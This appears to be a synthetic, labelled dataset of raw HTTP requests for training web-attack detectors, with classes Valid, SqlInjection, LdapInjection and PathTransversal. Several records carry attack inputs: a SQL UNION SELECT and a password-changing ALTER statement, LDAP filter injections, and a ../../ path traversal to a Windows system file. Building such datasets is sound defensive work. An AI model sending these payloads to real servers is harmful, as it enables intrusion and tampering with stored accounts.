Accept-Charset: shift_jis, x-mac-chinesesimp;q=0.7, x-mac-hebrew
Accept-Encoding: identity;q=0.0, identity, compress;q=0.0
Accept-Language: *
Cache-Control: min-fresh=58822
Client-ip: 182.78.121.182
Cookie: i2dbhtromeg=b<0;4za4=m?0d]p;jelNnncq=18830
Cookie2: $Version="60"
Date: Sun, 13 Jan 08 04:26:55 UTC
ETag: "xL9mR25tqa0yB5T"
Expect: 100-continue
From: 0vaorneD@ken7hhpNbe.st
If-Modified-Since: Wed, 06 Sep 06 13:25:59 CET
If-Unmodified-Since: Thu, 04 Nov 04 16:16:59 UTC
If-Match: "O1wsuCmTpSfQEuEt65"
If-None-Match: *
If-Range: "9T9ULjvohvv.hIO"
Max-Forwards: 496
MIME-Version: 7.6
Pragma: hhgeayn=iehlc
Proxy-Authorization: NTLM dTRjYWl0dG1zZGVzbm5pbmRhYnNpZ2NlZWVnb2RNbmRudTU4c29uRXRnZQ==
Authorization: gEna0 oeTsU=sleei
Range: 828-31900
Referer: /uIre6.cfm
TE: deflate,trailers,deflate;q=0.5
Trailer: Trailer
User-Agent: dRso9olats/8.1
UA-CPU: StrongARM
UA-Disp: 0058,1440,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 782x1634
Via: HTTP/9.6 225.242.47.132, 3.3 www.sswo.html, 5BT/0.7 74.137.85.212
Transfer-Encoding: deflate
Upgrade: eias4/8.2, 0it/9.6, nutr/1.8
Warning: 259 26.59.230.16:9392 "rytefdt" 
X-Forwarded-For: 59.157.184.124
X-Serial-Number: 7631325909856
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26410
Start - Id: 37328
class: LdapInjection
GET /5hw/eceFEtwj/dhorLlofg1aJaJtksNac/tImgnns4caeipi/tLtDpBhBgyOa.C45q0l/baaswpsdrgeddse6Zue/tUe/ijr8Q19418G/nmSc/uogaHoxilsee.php4?7Lytidtcf=sr9nnambkst HTTP/1.0
Host: 136.123.89.9:65609
Connection: o5dt
Accept: video/*;q=0.9, text/*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: 2603)(&(objectClass=xeh)(|(sn  =  efh)(cn=esmr    J*))
Cache-Control: no-store
Client-ip: 30.6.248.166
Cookie: 0lWcmn=wnn86;B6wZ=eu2t;Gnmrhcmmthc=3123892;vtef=3670075;Llao5n6d=shPzMGVI6W_
Cookie2: $Version="32"
Date: Wed, 30 Aug 06 11:20:39 UTC
ETag: W/"AgBJxgl1AIY7DzU9db"
Expect: ahws
From: ddtp@lesT.org
If-Modified-Since: Mon, 15 Nov 04 22:08:26 UTC
If-Unmodified-Since: Tue, 10 Jan 06 15:46:10 UTC
If-Match: "R_t2Fy4Z0mJmZ55fW"
If-None-Match: *
If-Range: Wed, 21 Feb 07 05:23:46 CET
Max-Forwards: 4892
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: dy7k pgiy=6bvq
Authorization: Digest qop=auth-int
Range: 1-568088,6956-8,075-
Referer: http://nnbsaR.fr/bhtIsmB/aanH/mterem.gif
TE: gzip,gzip;q=0.9,trailers
Trailer: Range
User-Agent: Mozilla/7.9 (Machintosh; U; PPC Mac OS X 4.4; ll-pn; rv:1.2.9) Gecko/68457114
UA-CPU: x86
UA-Disp: 2661,0577,16
UA-OS: Solaris
UA-Color: color16
Via: HTTP/0.2 www.ovhnaty.jpeg:0052, et3isf/9.3 www.iE8vj.jpg, 4.7 www.sewc.htm
Transfer-Encoding: identity
Upgrade: iHmLaa/1.0, enm/6.7, Feqe/5.3, 5la06/5.6
Warning: 644 www.kr8o.htm "Jnrqtdtsr4kgdnb5i" "Fri, 25 Aug 06 23:03:26 GMT"
X-Forwarded-For: 71.227.252.82
X-Serial-Number: 06549032
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37328
Start - Id: 13422
class: Valid
GET /cnvo7QP3Bt/tVdfan2wshe4rtwoi/ifg9E7ccJjeitd/aALpc6@j/7BKdmMk_TskT/nJy@KuSL/pAQkhWSVT.mdb?hneplaoit=187925 HTTP/1.1
Host: 139.9.96.98
Connection: keep-alive
Accept: audio/*;q=0.1, image/png;q=0.1
Accept-Charset: x-mac-japanese, iso-10646-ucs-2;q=0.1, big5, windows-1253;q=0.6
Accept-Encoding: identity, deflate;q=0.9
Accept-Language: *
Cache-Control: no-store
Client-ip: 145.120.39.202
Cookie: j7iUN0RQhome=o5@
Cookie2: $Version="886"
Date: Tue, 18 Oct 05 24:13:16 CET
ETag: W/"6NO9xH@_y-XBy77vF"
Expect: snRdnr
From: adtjceE@lott8nr.biz
If-Modified-Since: Wed, 18 Nov 09 06:32:14 GMT
If-Unmodified-Since: Mon, 18 Dec 06 08:50:51 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 584
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: 1iist ocdn=tilStt
Range: 7322-
Referer: http://www.eHsae.fr/qtsnrh.png
TE: gzip;q=0.7,deflate
Trailer: If-Unmodified-Since
User-Agent: rmeOkSe7lzoeim0eNg
UA-CPU: x86
UA-Disp: 1663,7844,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 020x602
Via: 0.9 25.36.45.30:21, tttnc/6.2 98.140.61.58
Transfer-Encoding: deflate
Upgrade: 9ItrTa/4.9, sege/5.6
Warning: 860 106.84.241.74 "tjotpe" "Mon, 24 Sep 07 08:43:20 UTC"
X-Forwarded-For: 220.88.204.10
X-Serial-Number: 8913868514720115974
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 13422
Start - Id: 11534
class: Valid
GET /9QfwhereE4evalysbgsoundgrA5/siLV2BqeQ8aRL6/qtf5sacfootr/hoisOZGMR9/8oJPzE17Fr/rCQ.jpg?t4o2on=w4ouff&7D1tr9tdh=a1F&befscbkd=nkj&mze=aartcuttpipassthrupolt&laptlm7l1a=fese+aCii%3Cl&AeqpFV=p%3Coom&IaoT=2&@aTXm=tgsAcl0&a3utt2elnm=tCYzNbZ&hsshli=elfwe&jPglNlsXvC=%3Dentetrths%29xo+e&ats=sGVE6bvQ&l4TgoljgTE=%3A9t HTTP/1.1
Host: www.pnii.biz:5
Connection: close
Accept: text/*, video/*, application/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 23.115.109.80
Cookie: nwat=vIakNnwindow.open&Acd;ghatxssew=70;lotjnsi6=eEq
Cookie2: $Version="6"
Date: Wed, 14 Apr 04 16:03:32 GMT
ETag: "DpYyaYBL0ilHEdE"
Expect: 100-continue
From: l8yyeu@teeroh8t1m.biz
If-Modified-Since: Sat, 11 Nov 06 21:11:26 UTC
If-Unmodified-Since: Sun, 02 Jan 05 13:27:56 GMT
If-Match: "LGylNH0BMGqWEuNn@aV"
If-None-Match: "wj9iMX6olV_p2UKqg"
If-Range: Wed, 05 Oct 05 10:45:07 UTC
Max-Forwards: 1913
MIME-Version: 6.1
Pragma: u5='cti'
Proxy-Authorization: Basic bmk0YW85ZXo6dXRhamE=
Authorization: Basic YmgzZkQycDo2bXNteW9l
Range: 95777-,06-396283,4310-04938
Referer: http://www.tbvflee.gov/twhnbnam.msf
TE: deflate;q=0.1,deflate;q=0.7,chunked
Trailer: If-Modified-Since
User-Agent: eiadxsat44oead2
UA-CPU: PowerPC
UA-Disp: 9055,045,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5189x1158
Via: FTP/9.6 25.61.110.214, FTP/9.2 69.182.174.1, HTTP/0.2 71.30.61.77
Transfer-Encoding: 3tRLgr
Upgrade: doots/6.6
Warning: 881 35.69.28.129 "mesddqopoikepkyer" 
X-Forwarded-For: 191.250.24.214
X-Serial-Number: 65042597
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11534
Start - Id: 45560
class: PathTransversal
GET /eo3hatE9sc/3Lrme/oi1/uCKM4iZ/eua01tsahewdaJm/bNwvZ/gnorah7fseherdttrti/seCLSaG_wU2RX/aN-4Sm2vG/1c9/tOp_ksfAZ4kPDaUP/bhaSsotpsAkfccoqO.jpg?06o=v4k5ieeeqiodt&q.@eTiAWjy=%5DeR5zoh&ino=ueEm%7Esamrtebbovh&dhdd0hsdheash=1tlawbisP&tiushett=E5insertyhhdivtfibtdR&rmLC_I=..%2F..%2F..%2FWINNT%2Fautoexec.bat&YoCY=o8+yhJr&E0=emwl&teo=einzi&er=at9%5Ci HTTP/1.1
Host: 188.79.186.188:2075
Connection: lsno
Accept: video/*;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 164.135.230.128
Cookie: nori=tx8anAA
Cookie2: $Version="73"
Date: Wed, 25 Mar 09 06:13:38 UTC
ETag: W/"ElVO6V06XBJ0jAyMvxr"
Expect: eeretq5E=a2orjnoo;dn0g
From: kccnlkv2@rodignu.de
If-Modified-Since: Sat, 10 Mar 07 12:14:12 CET
If-Unmodified-Since: Mon, 10 Aug 09 04:12:42 UTC
If-Match: "f9VHwgZRm03tTfOvB@u"
If-None-Match: *
If-Range: Tue, 10 Nov 09 23:51:34 GMT
Max-Forwards: 742
MIME-Version: 9.4
Pragma: mdwiv=lPr9eet
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="E22F9eE11467e7b1deeE0c6f3c56A53a"
Range: -7305
Referer: /7h3Raca/adlwpz.asp
TE: deflate,gzip;q=0.2,gzip;q=0.7
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.1 (Windows; U; WinNT 3.6; 6a-ei; rv:9.6.1) Gecko/65428952
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 220x9820
Via: HTTP/8.0 155.18.101.99, 6.7 www.vn1at4ir.css, 5.1 208.168.129.29:3
Transfer-Encoding: deflate
Upgrade: tvtmyl/0.9, dEhai/7.5, oiv8C/9.2, beNr/8.8, c9orN/8.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 145.196.47.34
X-Serial-Number: 86157391207979195
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45560
Start - Id: 4575
class: Valid
PUT /hdBzetTcigmiGbEodf/ogn33k0_@TaMXgj/hU3ZZU3xOiJw/nAVSu/iDrep63O22dabciehy/eHEIvqSEQt67hD@35/d_66Jcu/nE2uJXHI9CgDunPF/t5tudhvnite.php4? HTTP/1.0
Content-Length: 294
Content-Language: shgytiif
Content-Encoding: compress
Content-Location: /tria/blfstDas.asp
Content-MD5: ZW5ueG5Fd2dyZ2VBb2NyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Nov 09 06:09:20 CET
Last-Modified: Thu, 17 Jul 08 04:25:30 UTC
Host: 170.203.88.222:7428
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, gzip, deflate;q=0.0, gzip
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 130.12.96.52
Cookie: otait3h=htucnelvg
Cookie2: $Version="984"
Date: Wed, 24 May 06 24:46:56 UTC
ETag: "DruaFqr@-bJucBTZ"
Expect: fenc7s
From: aelste@lz6neetece.ch
If-Modified-Since: Mon, 01 Aug 05 13:31:12 GMT
If-Unmodified-Since: Fri, 23 Nov 07 23:55:48 UTC
If-Match: *
If-None-Match: "5grplj6sv5fOATmAv"
If-Range: Tue, 29 Aug 06 21:00:19 CET
Max-Forwards: 044
MIME-Version: 6.2
Pragma: 6e8=thGlo
Proxy-Authorization: NTLM bzhzeWdFb2U4c3R0bm9adWxhemVyRXJpY2V0cHd1a2V0ZGVhaXR2c29vdHNjbndk
Authorization: Digest nonce
Range: 03758-36,-88
Referer: /t5AoEii/joso/1tx1.rar
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/1.1 (compatible; Konqueror/3.7; Linux i586; oyriE; dmcenas; tootdCn0)
UA-CPU: StrongARM
UA-Disp: 067,349,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 817x165
Via: dEn/0.7 136.60.166.101, 7.5 www.ciud4.tiff, 88ae/8.3 www.yinneca.tiff:365
Transfer-Encoding: compress
Upgrade: y3ba/9.8
Warning: 486 www.o1emOvc.jpeg "et3dsadpnrneep" "Thu, 23 Feb 06 09:52:01 GMT"
X-Forwarded-For: 41.244.54.15
X-Serial-Number: 4085142165405
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

O6RN=%St+isaccept&ttliueyc1oOrr=nrR_7bBIYH.R&s5lnfe=D&ftgrrkwpItnbc=xterma9/&aleu7dMpgnrrdy=r&uBr2mN@4VuX=t@BqrtVFtt&4duUebfeerTun=64638&m6cC=5eLeDlomaa4cl&ul=bheyEauswttrUl/&0eitNdotoegtOtb=c5rT07D&imtrde=0043&n7tndsutbysrjl=wqshIswsteh&Xz7-pXQP=triNnre&5childiframeGWiR=sleslsSgDdtt

End - Id: 4575
Start - Id: 42791
class: SqlInjection
PUT /itds/fWLotfH/betoe/e6CruNL_XvCqm-ghq3/mie/a9mBCtys8@nb3sr6LRe/ePKMr5rTg1HnPF_Urs.png? HTTP/1.1
Content-Length: 111
Content-Language: isoarsE
Content-Encoding: identity
Content-Location: /icoMe3ej/nsmbuh/inaafej/bs27r12.dll
Content-MD5: aWRoMHRyMnFkb2FuWWVwYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 Feb 09 10:05:22 CET
Last-Modified: Thu, 20 Jan 05 05:49:26 CET
Host: www.et0Le.org
Connection: wanuw3b
Accept: */*;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: r-tp, a8jikag-osmcl;q=0.1, aE-lEitret4, iabdI-6i, N-qiw;q=0.8
Cache-Control: no-store
Client-ip: 106.46.255.142
Cookie: houcy=o2swyLrieW;0hdiee7m=8589;nS1N=44;b8-asnj9DW=;alter    table     asgent     set password   =  'ee2' where    name     = 'dh5hdas';
Cookie2: $Version="3"
Date: Tue, 07 Feb 06 13:29:36 CET
ETag: "cgY.nDUdJO7yjzxPF_"
Expect: 43ubo
From: y50ayc@nuqbmit.cz
If-Unmodified-Since: Thu, 08 Dec 05 15:52:53 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 16 Mar 09 22:31:08 CET
Max-Forwards: 6162
Pragma: o=ecrp
Proxy-Authorization: Digest username="eDiibrsi"
Authorization: Digest opaque="lel3"
Range: 866-,2-448736,67150-78210
Referer: /3oln/6yt6anMe/nasz/wbegu3.mp3
TE: trailers
User-Agent: Mozilla/0.9 (compatible; a3Esir; SunOS sun4u; lrrre; htewee)
UA-Disp: 811,9971,8
UA-Pixels: 952x987
Transfer-Encoding: moYgnh; hhoa=nnnceii
X-Serial-Number: 2573337780
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

pLl4Hm=giltg~&len61anr5odt=whse?g0&hr=nger7osaq&te1=otOphpn&sh0=h&q7iTi=7815&DK1fwjOQWvcatE=a tnjz/xzreul

End - Id: 42791
Start - Id: 18314
class: Valid
GET /oodtdeio3rlrtr2sn/UlAf.pl? HTTP/1.0
Host: 174.215.185.54:80
Connection: 8rthsqc
Accept: text/plain;q=0.0, audio/x-wav, image/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: e='int'
Client-ip: 215.36.116.35
Cookie: frmecxi=passthruoa;0air8oa5oc=Oh>;apeeslYlwrinn=prNtuob9s;2e43=hqe  ;gNsvnd1eshfnnh=ine -@aa
Cookie2: $Version="4"
Date: Sat, 12 May 07 02:16:24 UTC
ETag: "uhksSzdVKdXbiQ9ZQ"
Expect: rvsav2=sltuna;ndynn
From: dnouclte@Kesusuhhls.de
If-Modified-Since: Tue, 24 Feb 04 06:53:52 CET
If-Unmodified-Since: Fri, 15 May 09 24:14:03 GMT
If-Match: *
If-None-Match: "q.ktx@kHQ6D.ntY5hZ8s"
If-Range: Thu, 29 Apr 10 07:04:16 UTC
Max-Forwards: 13
MIME-Version: 6.5
Pragma: epst='r3'
Proxy-Authorization: NTLM dWVhM3Joc3d4YXJ0YW9udVNhdEx4aWVtZWhkYWFoYXRhYmFpTA==
Authorization: Basic ZmVtYWw6aWNjdQ==
Range: 33-392,-2077,7-8592
Referer: http://www.tebc.it/aibsg/n4ileroh/FteEcrNy/7hnv.mp3
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/0.6 (Windows; U; Windows NT 1.5; he-86; rv:1.6.9) Gecko/59925162
UA-CPU: x86
UA-Disp: 967,4917,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0744x394
Via: 2.1 www.ena87.gif, 0w21/1.9 173.235.138.179, 7.2 www.nusmaf6.png
Transfer-Encoding: 8rctea; tew2T=ie4oT
Upgrade: geO/3.5
Warning: 253 24.0.106.147 "r6nyEsuNdiuaaAlcTsi" "Sat, 27 Mar 04 01:27:38 CET"
X-Forwarded-For: 44.250.109.77
X-Serial-Number: 31774201
----: ------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 18314
Start - Id: 4070
class: Valid
PUT /3NPCrNqe8gqiALZIV/sg/e2mjTPk6OB1.htm? HTTP/1.0
Content-Length: 19
Content-Language: ata,atwrnoui,E
Content-Encoding: compress
Content-Location: /4caWene/0senu.css
Content-MD5: RXpTNGFhaWlyc2RvdXc0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 09 May 07 05:25:09 UTC
Last-Modified: Mon, 28 Jun 04 19:12:03 CET
Host: 200.255.64.17:80
Connection: cenenl5a
Accept: */*
Accept-Charset: big5, euc-tw;q=0.7, windows-1255;q=0.0, x-mac-arabic, euc-kr
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 51.190.25.118
Cookie: hiyt0kroe8=a(rD1'ia90i t;z9wp-Qinsert=tsqsesee;lm06eTarsld0iPe=p8e;obaiscgo=ens
Cookie2: $Version="43"
Date: Sat, 02 Apr 05 03:45:46 UTC
ETag: ".4qs9gvPEztffkiU_NyX"
Expect: igIfa=8aHsqiI
From: Erii3Szf@EEsesw.biz
If-Modified-Since: Wed, 02 Apr 08 04:23:06 UTC
If-Unmodified-Since: Fri, 28 Oct 05 24:42:51 CET
If-Match: *
If-None-Match: "GbK39dr20ZwZO-9LzB"
If-Range: Thu, 04 Jan 07 12:41:51 CET
Max-Forwards: 4
MIME-Version: 1.7
Pragma: Beisan=yog0eahi
Proxy-Authorization: Digest username="ltse"
Authorization: Digest cnonce="ewkrph"
Range: -604,34505-,2-3423
Referer: http://www.fO2o.net/nnqno.mdb
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: 2s@NBAm http://www.toye.fr
UA-CPU: 68000
UA-Disp: 055,684,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 401x600
Via: 2.8 www.ewc2ce.js, FTP/2.2 www.odesa.jpg, 7.5 85.168.8.144
Transfer-Encoding: deflate
Upgrade: ruvid/9.4, ll7tbi/9.9, raAh7/2.7, hEc/4.0, iier/4.2
Warning: 741 www.ymrehnc8.html "hiwtso0o3tsdhlea5" "Fri, 09 Jul 04 20:46:33 UTC"
X-Forwarded-For: 68.146.106.65
X-Serial-Number: 8957401
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

ElheiycDydiai=36127

End - Id: 4070
Start - Id: 17929
class: Valid
GET /xkMqV/nAls@dNnH7JHEH/jdenJeeg/8S3g@v-A-kd-p/tEN/ljpr7o1tiaxheJe/genvlCt1e7kIEttnftr6/gYFuIXE9Uwb.bin?aslmnb=4172379&hoeemvndtuso=sZ5RqklcIHL&ncWlUv=05052715&Io7nih6sooamvts=4&epka6hraus4l26=32293&show=71512&SoNpgtwle7Mt=etoEereniits9ierla&qlw62Nndchst=p&1aafcndAuvn=gaeEnpthne1trd&oaltkpoechj=60832&otigeogtpazwNE=euiiUD7zPk&atqisipowbsjl=604243&oor=o2EE&hr8p=xuMmug.tE HTTP/1.0
Host: www.otnt.biz:80
Connection: aityorn
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ZEe9-cwOww
Cache-Control: no-transform
Client-ip: 200.145.185.234
Cookie: acdzsuOq2ilsjiy= 
Cookie2: $Version="9"
Date: Sun, 13 Apr 08 09:34:54 CET
ETag: "zli2-5gEo_z.hpe@Pf"
Expect: ehxeonbf
From: 5eetcI@n8lRomisoe.st
If-Modified-Since: Sun, 07 Nov 04 12:08:13 GMT
If-Unmodified-Since: Sat, 04 Oct 08 03:45:04 UTC
If-Match: "8cop9gkDsQp3lAseia7"
If-None-Match: "mZLw-Rt6tm5KP7Sm"
If-Range: Sun, 18 Apr 04 15:48:57 GMT
Max-Forwards: 87
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Basic cXluY1NlYzpic3p0dTdt
Authorization: NTLM N2l0eWhleHJ0d2hzc0QxYjZ0Y2VsbWFmZTRIMGVlMDNkb25FaGVlVGVVZW9sZWVj
Range: 05-,-776516,-07
Referer: http://www.ltieen.org/toirlw.jsp
TE: chunked,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/8.2 (compatible; Konqueror/4.6; Open BSD i586; tl9rgA3e; kolknaut; jnnes)
UA-CPU: Sparc
UA-Disp: 427,601,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 523x1389
Via: 5.0 126.132.170.178:0037, 0.2 www.haiityrs.js:8
Transfer-Encoding: identity
Upgrade: trreS/8.8, eNTsed/3.4, setle/6.0, 0nlw/3.2
Warning: 811 8.238.208.132 "oayc7e2eesA2nuA" 
X-Forwarded-For: 188.200.228.132
X-Serial-Number: 8381908250645
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17929
Start - Id: 41953
class: SqlInjection
GET /hablrk.Gv/3OjKexecUrperl1QO.css?C0LBmwN=%24rtpShA7sam&me7o9ymnueuBdR=86&kGtelnettQyKgprYy=rracceptEs&sthlrEsnanssea=856032&fzPlee2usrenea=%27+%29++UNION+++++ALL++++SELECT++7350%2C38%2C384%2C115%2C125+FROM+eduvnEts0c+WHERE+%28%27%27++%3D++++%27&pYZ9QBXnHGD=ooA&En_etcsH=ssABRGJ2&SLMM=7&hpadZnu=lu&n3yhva=s-Tvat&8scrhv8snobbted=512&eAtsessiIn=AorsnRhilnmslue&tbbs3xzi4=DtDemetai%26u7s&iab2isnm=+hrwtGlhaCsez&a39OVeNOv=mffH6zngiyn HTTP/1.1
Host: www.6rne.org
Connection: fs2d9
Accept: */*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: identity, deflate;q=0.3, compress
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 54.102.14.216
Cookie: ijSIes=oBFe;nhnetaesea4g07=psAtslink7s-m8dmocha<t;RYJgWHHhoK=o5;g9xQ9Jl=noaybbodytie1ssou;gwaue20Uiwj=eionhrsjtnnpI;neeLnnvsirNyovh=41
Cookie2: $Version="80"
Date: Thu, 02 Sep 04 10:41:34 GMT
ETag: W/"L5smUaADBs4uUok.30rh"
Expect: w9indwk=ssrsuoT
From: aczlmel@lftnTc.net
If-Modified-Since: Fri, 17 Apr 09 02:17:04 GMT
If-Unmodified-Since: Thu, 08 Oct 09 16:46:05 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4540
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic MW5lYW1OdG46YXN0bHRlbnI=
Authorization: Digest username="aEmaxdo"
Range: 55660-
Referer: http://www.iionse.com/c2noe/gwSqs/4eonute/tXsr.cfm
TE: trailers
Trailer: Connection
User-Agent: s6kfrmNV http://www.ntt8.fr
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1383x317
Via: HTTP/1.5 www.hnd0o.html, FTP/2.4 88.227.154.124:765
Transfer-Encoding: compress
Upgrade: ep1Mri/9.9, tcn/2.5, elb8/5.8, eeNie/7.6
Warning: 380 180.68.76.182:324 "6hooeiOocsdeo" 
X-Forwarded-For: 116.82.96.232
X-Serial-Number: 41242078999326437
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41953
Start - Id: 37555
class: LdapInjection
PUT /mnto7vN/iprV/ewRY4rBufjka0dZl.css? HTTP/1.0
Content-Length: 327
Content-Language: gchehb0,btnl3i
Content-Encoding: identity
Content-Location: http://drggs.uk/swntsa4/i1aAzoi/eManega/afb1.jsp
Content-MD5: YWVsYmFlTWluMXJndHJkcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 May 04 04:09:46 CET
Last-Modified: Tue, 12 May 09 17:18:04 CET
Host: www.Qoslfeaast.org
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: x-mac-japanese;q=0.7, iso-8859-7;q=0.0, x-mac-turkish;q=0.6
Accept-Encoding: *
Accept-Language: Isebtc-eq, jedC-ch;q=0.0, iedlre-mrn;q=0.7, 3Nnar-aEVe;q=0.6
Cache-Control: max-stale
Client-ip: 30.21.196.2
Cookie: sOomnmz4s=tihr7ue;4iurcleomtdsh5E=QaeonullkfJt];lsDy=174655;We.WWphpcuj5X-=203
Cookie2: $Version="00"
Date: Tue, 15 Jan 08 21:45:22 UTC
ETag: "DKMeyFEGPC-DDbSpr"
Expect: ontekast
From: oenu@5hnawusete.de
If-Modified-Since: Fri, 03 Oct 08 21:29:41 CET
If-Unmodified-Since: Tue, 09 Nov 04 03:04:38 UTC
If-Match: "5HrHWNqt-vzBcgI8"
If-None-Match: "w5qO6lXigKlPybS3TT3"
If-Range: Fri, 28 Nov 08 16:07:52 UTC
Max-Forwards: 89
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: NTLM dWlobm9qY0FpVXJqd251dGVkZXRzZG5vMTVlbGFjcmVuZWFnZWRlaW1lZnRy
Authorization: Basic Y2pnTjpzZWFTdw==
Range: -78728,9752-,0169-21
Referer: /i5e0u6la/meqm.bin
TE: deflate
Trailer: If-None-Match
User-Agent: eAe21/4.8.0.2.8
UA-CPU: MIPS
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 1680x065
Via: 7.5 www.isna.png:1886, 2.8 www.3mnbaFud.htm:2142, HTTP/2.3 136.81.171.230
Transfer-Encoding: tireo
Upgrade: etMr/2.7
Warning: 384 59.186.228.229 "atuGyeetiitsHF" 
X-Serial-Number: 01594707388200191754
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sxesfttmixee8=titwd2child/s&NbetweenWsRUN1S=libcat&ehago=] tt[imgrln Gz9a&rblm=t0sk&87Tuntlk=eAjLOuAVTxAe&jtdrilatel=tiwlUo7MV9&sinn6treni=a>lL&p2hh=mtO&ewto=eydbyus&udorw1=t0iMWQhQS&6e=) (   |(displayName=had*)    (name=    had*)(  mail=had*  )&Hneumgei=vrOnan&gm1kgmwKso9ob=12344991&duvrd=nTMe

End - Id: 37555
Start - Id: 2080
class: Valid
GET /derFitfneCHmejdro2/csL.QursCtQgh/oE7XsgE/aiosoEnailne/onworl4znginwnterres/kBcqinaDEv/ikx0c.MRtR/AE0aO3K6ilike1p/asqEyaaoosceio.sh?eitdesmNbt=s%2Fi&msoyisTr14t=76&ebeunljtnh=jAd&itdqxarirAoe4=h1aNraauvnrkiist&yPe1o=6&oevadAbrrtttxm=mrctanad&LltgT4nw8tf=876&oax7ldstgndnn0l=l%27ucstdin&eRiene=tn8Lns&to=r&facdisy3=asftt&ot=832137&mXsam1Ev=ertaa HTTP/1.0
Host: www.hftdLhc.net
Connection: keep-alive
Accept: text/xml
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: aor5ie-Ead, rOl-0eep, nicdtGot-Eonpth
Cache-Control: only-if-cached
Client-ip: 129.157.87.215
Cookie: no=5w;20qa2EpsKiA=$r$nu?remR5y;mbtmwhtha6=lTaelwTltaby;b742hepsieG5le=1SX.rd
Cookie2: $Version="71"
Date: Fri, 22 Aug 08 08:43:43 GMT
ETag: W/"OYtbSdFPKASQFidRef"
Expect: Nkletrex
From: Iosu@aert5hd.ch
If-Modified-Since: Mon, 19 Mar 07 19:03:15 CET
If-Unmodified-Since: Sun, 26 Jul 09 02:16:03 CET
If-Match: "aXB6LNuLzFqqz8O"
If-None-Match: *
If-Range: Sun, 15 Nov 09 20:18:55 UTC
Max-Forwards: 22
MIME-Version: 8.5
Pragma: snu=psoioNe
Proxy-Authorization: Basic bDU0RTVvcjphZWEwdA==
Authorization: NTLM dWdFdHRoYWwxb2g1aWhzZnJjOGF0U28yNDUyZXM2aTZiNzJlMQ==
Range: -057481,324566-108,947493-06192
Referer: /noTw6a/5QeEl8l/yonueny/Rbrepe/dlrt.css
TE: trailers,gzip
Trailer: TE
User-Agent: Mozilla/2.4 (Windows; U; WinNT 2.6; sD-e0; rv:8.8.9) Gecko/86083364
UA-CPU: StrongARM
UA-Disp: 4115,383,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9053x775
Via: FTP/2.5 115.197.209.44
Transfer-Encoding: tlvs; uwvla=rSdhfsee
Upgrade: hli/9.0
Warning: 818 177.52.40.0:7 "eese0qtmam" "Thu, 12 Nov 09 18:55:16 GMT"
